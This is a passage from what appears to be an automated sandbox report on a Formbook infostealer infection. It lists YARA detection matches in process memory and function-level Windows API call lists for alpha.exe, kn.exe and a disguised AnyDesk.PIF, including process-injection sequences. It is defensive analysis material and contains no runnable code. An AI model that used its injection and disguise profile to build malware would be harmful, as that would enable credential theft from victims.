          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: AnyDesk.PIF PID: 8064, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SndVol.exe PID: 7528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: msdt.exe PID: 4040, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E943898C NtQueryInformationToken,4_2_00007FF6E943898C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9423D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF6E9423D94
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9451538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94389E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF6E94389E4
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9438114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF6E9438114
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF6E94388C0
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF6E944BCF0
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9437FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF6E9437FF8
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E943898C NtQueryInformationToken,6_2_00007FF6E943898C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9423D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF6E9423D94
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9451538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94389E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF6E94389E4
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9438114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF6E9438114
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF6E94388C0
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E944BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF6E944BCF0
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9437FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF6E9437FF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68550C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF68550C964
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,10_2_02D5B118
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D57A2C NtAllocateVirtualMemory,10_2_02D57A2C
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,10_2_02D5DC8C
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02D5DC04
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,10_2_02D5DD70
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D57D78 NtWriteVirtualMemory,10_2_02D57D78
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D57A2A NtAllocateVirtualMemory,10_2_02D57A2A
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02D5DBB0
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D58D70 GetThreadContext,SetThreadContext,NtResumeThread,10_2_02D58D70
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D58D6E GetThreadContext,SetThreadContext,NtResumeThread,10_2_02D58D6E
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9438114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF6E9438114
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9437FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF6E9437FF8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943898C NtQueryInformationToken,11_2_00007FF6E943898C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9423D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF6E9423D94
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9451538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94389E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF6E94389E4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF6E94388C0
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF6E944BCF0
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9425240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF6E9425240
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9434224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF6E9434224
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942AA544_2_00007FF6E942AA54
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9430A6C4_2_00007FF6E9430A6C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94355544_2_00007FF6E9435554
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94342244_2_00007FF6E9434224
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94337D84_2_00007FF6E94337D8
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944EE884_2_00007FF6E944EE88
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942E6804_2_00007FF6E942E680
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942D2504_2_00007FF6E942D250
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9429E504_2_00007FF6E9429E50
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94276504_2_00007FF6E9427650
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94252404_2_00007FF6E9425240
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9447F004_2_00007FF6E9447F00
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942372C4_2_00007FF6E942372C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9426EE44_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94515384_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942CE104_2_00007FF6E942CE10
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9428DF84_2_00007FF6E9428DF8
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9424A304_2_00007FF6E9424A30
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944AA304_2_00007FF6E944AA30
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94222204_2_00007FF6E9422220
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94281D44_2_00007FF6E94281D4
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944D9D04_2_00007FF6E944D9D0
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94218844_2_00007FF6E9421884
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944AC4C4_2_00007FF6E944AC4C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9422C484_2_00007FF6E9422C48
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94378544_2_00007FF6E9437854
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94285104_2_00007FF6E9428510
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9427D304_2_00007FF6E9427D30
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94318D44_2_00007FF6E94318D4
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942B0D84_2_00007FF6E942B0D8
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9423F904_2_00007FF6E9423F90
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9429B504_2_00007FF6E9429B50
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9425B704_2_00007FF6E9425B70
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94234104_2_00007FF6E9423410
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944AFBC4_2_00007FF6E944AFBC
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9426BE04_2_00007FF6E9426BE0
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E942AA546_2_00007FF6E942AA54
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9430A6C6_2_00007FF6E9430A6C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94355546_2_00007FF6E9435554
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94342246_2_00007FF6E9434224
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94337D86_2_00007FF6E94337D8
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E944EE886_2_00007FF6E944EE88
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E942E6806_2_00007FF6E942E680
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E942D2506_2_00007FF6E942D250
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9429E506_2_00007FF6E9429E50
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94276506_2_00007FF6E9427650
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94252406_2_00007FF6E9425240
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9447F006_2_00007FF6E9447F00
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E942372C6_2_00007FF6E942372C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9426EE46_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94515386_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E942CE106_2_00007FF6E942CE10
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9428DF86_2_00007FF6E9428DF8
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9424A306_2_00007FF6E9424A30
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E944AA306_2_00007FF6E944AA30
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94222206_2_00007FF6E9422220
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94281D46_2_00007FF6E94281D4
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E944D9D06_2_00007FF6E944D9D0
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94218846_2_00007FF6E9421884
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E944AC4C6_2_00007FF6E944AC4C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9422C486_2_00007FF6E9422C48
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94378546_2_00007FF6E9437854
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94285106_2_00007FF6E9428510
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9427D306_2_00007FF6E9427D30
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94318D46_2_00007FF6E94318D4
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E942B0D86_2_00007FF6E942B0D8
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9423F906_2_00007FF6E9423F90
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9429B506_2_00007FF6E9429B50
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9425B706_2_00007FF6E9425B70
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94234106_2_00007FF6E9423410
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E944AFBC6_2_00007FF6E944AFBC
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9426BE06_2_00007FF6E9426BE0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685422F387_2_00007FF685422F38
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FF0207_2_00007FF6854FF020
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FCCB87_2_00007FF6854FCCB8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855238007_2_00007FF685523800
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FC1207_2_00007FF6854FC120
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FBC107_2_00007FF6854FBC10
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548C6F87_2_00007FF68548C6F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547C6D07_2_00007FF68547C6D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855085A87_2_00007FF6855085A8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AE57C7_2_00007FF6854AE57C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854625807_2_00007FF685462580
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E45387_2_00007FF6854E4538
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854485707_2_00007FF685448570
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547655C7_2_00007FF68547655C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DC6307_2_00007FF6854DC630
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854786307_2_00007FF685478630
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855185EC7_2_00007FF6855185EC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854205E07_2_00007FF6854205E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855028547_2_00007FF685502854
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549E8447_2_00007FF68549E844
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F08C87_2_00007FF6854F08C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F48C47_2_00007FF6854F48C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855067507_2_00007FF685506750
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C07D07_2_00007FF6854C07D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854927D07_2_00007FF6854927D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549C7F07_2_00007FF68549C7F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543227C7_2_00007FF68543227C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854862807_2_00007FF685486280
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546E29C7_2_00007FF68546E29C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F42747_2_00007FF6854F4274
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854301407_2_00007FF685430140
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854181707_2_00007FF685418170
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855241F87_2_00007FF6855241F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D821C7_2_00007FF6854D821C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546C1D07_2_00007FF68546C1D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549A1E87_2_00007FF68549A1E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F04907_2_00007FF6854F0490
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A84887_2_00007FF6854A8488
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854684847_2_00007FF685468484
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854564A87_2_00007FF6854564A8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548A4507_2_00007FF68548A450
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548C4507_2_00007FF68548C450
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541C5207_2_00007FF68541C520
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854824D47_2_00007FF6854824D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549E4F07_2_00007FF68549E4F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854244E07_2_00007FF6854244E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F84D87_2_00007FF6854F84D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854703987_2_00007FF685470398
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545E3A07_2_00007FF68545E3A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F234C7_2_00007FF6854F234C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A63747_2_00007FF6854A6374
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854984147_2_00007FF685498414
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854344107_2_00007FF685434410
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68552842F7_2_00007FF68552842F
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FE4307_2_00007FF6854FE430
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541A4247_2_00007FF68541A424
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A43D07_2_00007FF6854A43D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F8EAC7_2_00007FF6854F8EAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F4E587_2_00007FF6854F4E58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685438F1C7_2_00007FF685438F1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544EED47_2_00007FF68544EED4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685416EF47_2_00007FF685416EF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685486D7C7_2_00007FF685486D7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543EDA47_2_00007FF68543EDA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F2D6C7_2_00007FF6854F2D6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546D0947_2_00007FF68546D094
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545107C7_2_00007FF68545107C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542B09C7_2_00007FF68542B09C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D511C7_2_00007FF6854D511C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B4F947_2_00007FF6854B4F94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685444F907_2_00007FF685444F90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854110307_2_00007FF685411030
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685496A847_2_00007FF685496A84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549EA7C7_2_00007FF68549EA7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E4A407_2_00007FF6854E4A40
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685504A587_2_00007FF685504A58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FAA587_2_00007FF6854FAA58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685464B307_2_00007FF685464B30
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854689907_2_00007FF685468990
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854769847_2_00007FF685476984
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854129407_2_00007FF685412940
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549AA007_2_00007FF68549AA00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854709EC7_2_00007FF6854709EC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA9F07_2_00007FF6854EA9F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547E9F07_2_00007FF68547E9F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548CC807_2_00007FF68548CC80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ACCA87_2_00007FF6854ACCA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551CC8C7_2_00007FF68551CC8C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8C587_2_00007FF6854E8C58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546CD107_2_00007FF68546CD10
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685428D007_2_00007FF685428D00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2CF87_2_00007FF6854A2CF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685468D2C7_2_00007FF685468D2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685472D187_2_00007FF685472D18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685508CF47_2_00007FF685508CF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C6B947_2_00007FF6854C6B94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685434B687_2_00007FF685434B68
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541AC087_2_00007FF68541AC08
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545CBFC7_2_00007FF68545CBFC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685460C287_2_00007FF685460C28
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685488BD47_2_00007FF685488BD4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C76787_2_00007FF6854C7678
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F76787_2_00007FF6854F7678
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854676B07_2_00007FF6854676B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CD6A07_2_00007FF6854CD6A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854556487_2_00007FF685455648
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F36387_2_00007FF6854F3638
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E56607_2_00007FF6854E5660
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543D6607_2_00007FF68543D660
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ED6DC7_2_00007FF6854ED6DC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F6D87_2_00007FF68549F6D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544B58C7_2_00007FF68544B58C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E95807_2_00007FF6854E9580
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544156C7_2_00007FF68544156C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541F6107_2_00007FF68541F610
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854995FC7_2_00007FF6854995FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854755F07_2_00007FF6854755F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854778907_2_00007FF685477890
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A184C7_2_00007FF6854A184C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E38747_2_00007FF6854E3874
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AD8587_2_00007FF6854AD858
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854658CC7_2_00007FF6854658CC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542B7887_2_00007FF68542B788
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854697907_2_00007FF685469790
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854937607_2_00007FF685493760
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542F8007_2_00007FF68542F800
